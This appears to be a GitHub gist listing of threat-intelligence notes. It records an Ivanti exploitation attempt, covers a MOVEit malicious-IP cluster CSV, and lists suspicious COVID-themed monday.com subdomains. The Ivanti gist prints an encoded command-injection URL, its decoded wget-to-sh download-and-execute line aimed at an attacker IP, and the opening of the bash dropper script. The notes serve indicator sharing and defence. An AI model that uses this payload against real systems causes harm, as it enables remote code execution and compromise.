kimber kimber99
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| first stage: /api/v1/totp/user-backup-code/../../license/keys-status/%3b%77%67%65%74%20%2d%2d%74%69%6d%65%6f%75%74%3d%32%30%20%2d%2d%6e%6f%2d%63%68%65%63%6b%2d%63%65%72%74%69%66%69%63%61%74%65%20%2d%71%20%2d%4f%2d%20%68%74%74%70%73%3a%2f%2f%34%35%2e%31%33%30%2e%32%32%2e%32%31%39%2f%69%76%61%6e%74%69%2e%6a%73%7c%73%68%3b%0a | |
| decodes to: /api/v1/totp/user-backup-code/../../license/keys-status/;wget --timeout=20 --no-check-certificate -q -O- https://45.130.22.219/ivanti.js|sh; | |
| index of hosting on 45.130.22.219 says "Hacked by voadu" | |
| scanned on URLScan.io Submission: On January 22 via manual (January 22nd 2024, 3:26:21 am UTC) from JP — Scanned from NL | |
| ivanti.js: | |
| #!/bin/bash | |
| url='https://45.130.22.219/ivanti' | |
| name1=`date +%s%N` | |
| wget --no-check-certificate ${url} -O /etc/$name1 |
kimber99
/ Move_IT_IOC_Similarity_Cluster.csv
Last active
June 7, 2023 15:16
MoveIT 138.197.152.201 IP Similarity Cluster
We can make this file beautiful and searchable if this error is corrected: It looks like row 2 should actually have 24 columns, instead of 22 in line 1.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ip,classification,first_seen,last_seen,actor,spoofable,asn,category,country,country_code,source_country,source_country_code,destination_countries,destination_country_codes,city,organization,rdns,tor,os,tags,ja3,scans,paths,useragents | |
| 170.64.134.89,malicious,2023-02-07,2023-06-07,unknown,false,AS14061,hosting,Australia,AU,,,,,Sydney,"DigitalOcean, LLC",,false,Linux 2.2.x-3.x (Embedded),MOVEit Transfer Scanner|Sharepoint Scanner|SSH Bruteforcer|SSH Worm|TLS/SSL Crawler|Web Crawler|ZMap Client,cba7f34191ef2379c1325641f6c6c4f4:80|cba7f34191ef2379c1325641f6c6c4f4:443|cba7f34191ef2379c1325641f6c6c4f4:1234|cba7f34191ef2379c1325641f6c6c4f4:3333|cba7f34191ef2379c1325641f6c6c4f4:4433|cba7f34191ef2379c1325641f6c6c4f4:4444|cba7f34191ef2379c1325641f6c6c4f4:5555|cba7f34191ef2379c1325641f6c6c4f4:6666|cba7f34191ef2379c1325641f6c6c4f4:7777|cba7f34191ef2379c1325641f6c6c4f4:8080|cba7f34191ef2379c1325641f6c6c4f4:9999,22/TCP|80/TCP|81/TCP|443/TCP|1234/TCP|3333/TCP|4433/TCP|4444/TCP|5555/TCP|6666/TCP|7777/TCP|8000/TCP|8080/TCP|808 |
kimber99
/ Monday.com covid subdomains
Created
September 15, 2022 20:53
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| bank-stopcovid.email811.monday.com | |
| bank.stopcovid.email560.monday.com | |
| bank.stopcovid.email790.monday.com | |
| bank.stopcovidemail790.monday.com | |
| covid-19-email790.monday.com | |
| covid-19-email830.monday.com | |
| covid-allianz71.monday.com | |
| covid-email821.monday.com | |
| covid19-email560.monday.com | |
| covid19-violncia-contra-a-mulhe23111.monday.com |